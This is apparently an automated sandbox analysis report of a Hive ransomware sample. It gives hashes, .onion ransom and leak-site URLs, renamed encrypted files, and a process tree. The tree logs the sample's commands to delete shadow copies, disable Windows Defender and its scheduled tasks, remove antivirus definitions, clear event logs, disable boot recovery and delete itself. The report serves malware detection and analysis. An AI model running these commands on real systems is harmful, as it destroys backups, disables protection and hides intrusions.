Resubmissions
12-01-2022 14:09  220112-rgdpqacghr  10
12-01-2022 14:06  220112-rertkacga3  10
12-01-2022 14:00  220112-rbg5yscfh2  10
Analysis
max time kernel: 156s
max time network: 179s
platform: windows10_x64
resource: win10-en-20211208
submitted: 12-01-2022 14:09
Static task: static1
Behavioral task: behavioral1
Sample: 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe
Resource: win7-en-20211208
General
Target: 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe
Size: 3.8MB
MD5: 32bd8e6843879a761e6fa9436a90bb66
SHA1: 26dde522d6f3f87ac982495028494c7f50799696
SHA256: 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177
SHA512: c7e437c61980385ce57fe2a0dc0988aeba4609ac1ac7b7c07951c10c6bc38772c7ad1442571ab6409c8ea04991844e7ad95b5a9b35e31996f7aad9db4020716f
Malware Config
Extracted
Path: C:\Program Files\7-Zip\rFSH_HOW_TO_DECRYPT.txt
Family: hive
URLs:
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
pid 2708 MpCmdRun.exe
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
pid 1428 bcdedit.exe
pid 3012 bcdedit.exe
Modifies extensions of user files 12 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\BackupUnpublish.raw.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_BgAAAAYAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File renamed C:\Users\Admin\Pictures\CompareFind.crw => C:\Users\Admin\Pictures\CompareFind.crw.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\PopStart.png.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File renamed C:\Users\Admin\Pictures\StepRestart.raw => C:\Users\Admin\Pictures\StepRestart.raw.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\UninstallEnable.png.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_CAAAAAgAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\SelectUnlock.tif.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File renamed C:\Users\Admin\Pictures\BackupUnpublish.raw => C:\Users\Admin\Pictures\BackupUnpublish.raw.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_BgAAAAYAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\CompareFind.crw.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File renamed C:\Users\Admin\Pictures\PopStart.png => 
C:\Users\Admin\Pictures\PopStart.png.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File renamed C:\Users\Admin\Pictures\SelectUnlock.tif => C:\Users\Admin\Pictures\SelectUnlock.tif.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\StepRestart.raw.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe File renamed C:\Users\Admin\Pictures\UninstallEnable.png => C:\Users\Admin\Pictures\UninstallEnable.png.tBxdOiTkOCmEzR6GZw0ims6ZXOH3uaszdRYJpsr42aj_CAAAAAgAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
pid 3664 vssadmin.exe
Modifies registry class 3 IoCs
Processes:
reg.exe: Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP
reg.exe: Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP
reg.exe: Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP
Opens file in notepad (likely ransom note) 2 IoCs
Processes:
pid 3388 NOTEPAD.EXE
pid 3172 notepad.exe
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
pid 1424 powershell.exe
pid 1424 powershell.exe
pid 1424 powershell.exe
pid 3784 powershell.exe
pid 3784 powershell.exe
pid 3784 powershell.exe
pid 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe
pid 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
Process tree (indentation shows the parent/child depth recorded by the sandbox):

- C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe (PID 3772)
  Command line: "C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe"
  Signatures: Modifies extensions of user files; Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  - C:\Windows\SYSTEM32\net.exe (PID 1152)
    Command line: net.exe stop "SamSs" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 3972)
      Command line: C:\Windows\system32\net1 stop "SamSs" /y
  - C:\Windows\SYSTEM32\net.exe (PID 1964)
    Command line: net.exe stop "SDRSVC" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 4072)
      Command line: C:\Windows\system32\net1 stop "SDRSVC" /y
  - C:\Windows\SYSTEM32\net.exe (PID 2808)
    Command line: net.exe stop "SstpSvc" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1196)
      Command line: C:\Windows\system32\net1 stop "SstpSvc" /y
  - C:\Windows\SYSTEM32\net.exe (PID 1216)
    Command line: net.exe stop "UI0Detect" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 3960)
      Command line: C:\Windows\system32\net1 stop "UI0Detect" /y
  - C:\Windows\SYSTEM32\net.exe (PID 1868)
    Command line: net.exe stop "vmicvss" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1384)
      Command line: C:\Windows\system32\net1 stop "vmicvss" /y
  - C:\Windows\SYSTEM32\net.exe (PID 2152)
    Command line: net.exe stop "VSS" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 3012)
      Command line: C:\Windows\system32\net1 stop "VSS" /y
  - C:\Windows\SYSTEM32\net.exe (PID 4044)
    Command line: net.exe stop "wbengine" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 2312)
      Command line: C:\Windows\system32\net1 stop "wbengine" /y
  - C:\Windows\SYSTEM32\net.exe (PID 388)
    Command line: net.exe stop "WebClient" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 924)
      Command line: C:\Windows\system32\net1 stop "WebClient" /y
  - C:\Windows\SYSTEM32\net.exe (PID 740)
    Command line: net.exe stop "UnistoreSvc_12d5a" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1268)
      Command line: C:\Windows\system32\net1 stop "UnistoreSvc_12d5a" /y
  - C:\Windows\SYSTEM32\sc.exe (PID 860)
    Command line: sc.exe config "SamSs" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 1080)
    Command line: sc.exe config "SDRSVC" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 1344)
    Command line: sc.exe config "SstpSvc" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 1340)
    Command line: sc.exe config "UI0Detect" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 2092)
    Command line: sc.exe config "vmicvss" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 1680)
    Command line: sc.exe config "VSS" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 1968)
    Command line: sc.exe config "wbengine" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 2192)
    Command line: sc.exe config "WebClient" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 3048)
    Command line: sc.exe config "UnistoreSvc_12d5a" start= disabled
  - C:\Windows\SYSTEM32\reg.exe (PID 3636)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 3068)
    Command line: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 2064)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 1972)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 2680)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 2540)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 3648)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 3228)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 3580)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 3884)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 2504)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 3996)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 3564)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 2776)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 3600)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 3484)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  - C:\Windows\SYSTEM32\schtasks.exe (PID 2156)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  - C:\Windows\SYSTEM32\schtasks.exe (PID 3360)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  - C:\Windows\SYSTEM32\schtasks.exe (PID 3708)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  - C:\Windows\SYSTEM32\schtasks.exe (PID 2912)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  - C:\Windows\SYSTEM32\schtasks.exe (PID 988)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  - C:\Windows\SYSTEM32\reg.exe (PID 4088)
    Command line: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 1088)
    Command line: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 3308)
    Command line: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 1496)
    Command line: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
    Signatures: Modifies registry class
  - C:\Windows\SYSTEM32\reg.exe (PID 1756)
    Command line: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    Signatures: Modifies registry class
  - C:\Windows\SYSTEM32\reg.exe (PID 1920)
    Command line: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    Signatures: Modifies registry class
  - C:\Windows\SYSTEM32\reg.exe (PID 620)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 376)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 2648)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 792)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 1048)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    Signatures: Modifies security service
  - C:\Windows\SYSTEM32\reg.exe (PID 3096)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\SYSTEM32\vssadmin.exe (PID 3664)
    Command line: vssadmin.exe delete shadows /all /quiet
    Signatures: Interacts with shadow copies
  - C:\Windows\SYSTEM32\wevtutil.exe (PID 3064)
    Command line: wevtutil.exe cl system
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\wevtutil.exe (PID 3936)
    Command line: wevtutil.exe cl security
  - C:\Windows\SYSTEM32\wevtutil.exe (PID 3944)
    Command line: wevtutil.exe cl application
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\Wbem\wmic.exe (PID 1896)
    Command line: wmic.exe SHADOWCOPY /nointeractive
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\Wbem\wmic.exe (PID 1208)
    Command line: wmic.exe shadowcopy delete
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\bcdedit.exe (PID 1428)
    Command line: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    Signatures: Modifies boot configuration data using bcdedit
  - C:\Windows\SYSTEM32\bcdedit.exe (PID 3012)
    Command line: bcdedit.exe /set {default} recoveryenabled no
    Signatures: Modifies boot configuration data using bcdedit
  - C:\Windows\SYSTEM32\cmd.exe (PID 2312)
    Command line: cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    - C:\Program Files\Windows Defender\MpCmdRun.exe (PID 2708)
      Command line: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      Signatures: Deletes Windows Defender Definitions
  - C:\Windows\SYSTEM32\cmd.exe (PID 1744)
    Command line: cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1424)
      Command line: powershell Set-MpPreference -DisableIOAVProtection $true
      Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Windows\SYSTEM32\cmd.exe (PID 964)
    Command line: cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3784)
      Command line: powershell Set-MpPreference -DisableRealtimeMonitoring $true
      Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Windows\SYSTEM32\notepad.exe (PID 3172)
    Command line: notepad.exe C:\rFSH_HOW_TO_DECRYPT.txt
    Signatures: Opens file in notepad (likely ransom note)
  - C:\Windows\SYSTEM32\cmd.exe (PID 1816)
    Command line: cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe"
    - C:\Windows\system32\PING.EXE (PID 3880)
      Command line: ping.exe -n 5 127.0.0.1
      Signatures: Runs ping.exe
- C:\Windows\system32\NOTEPAD.EXE (PID 3388)
  Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\rFSH_HOW_TO_DECRYPT.txt
  Signatures: Opens file in notepad (likely ransom note)
Network
MITRE ATT&CK Enterprise v6
Downloads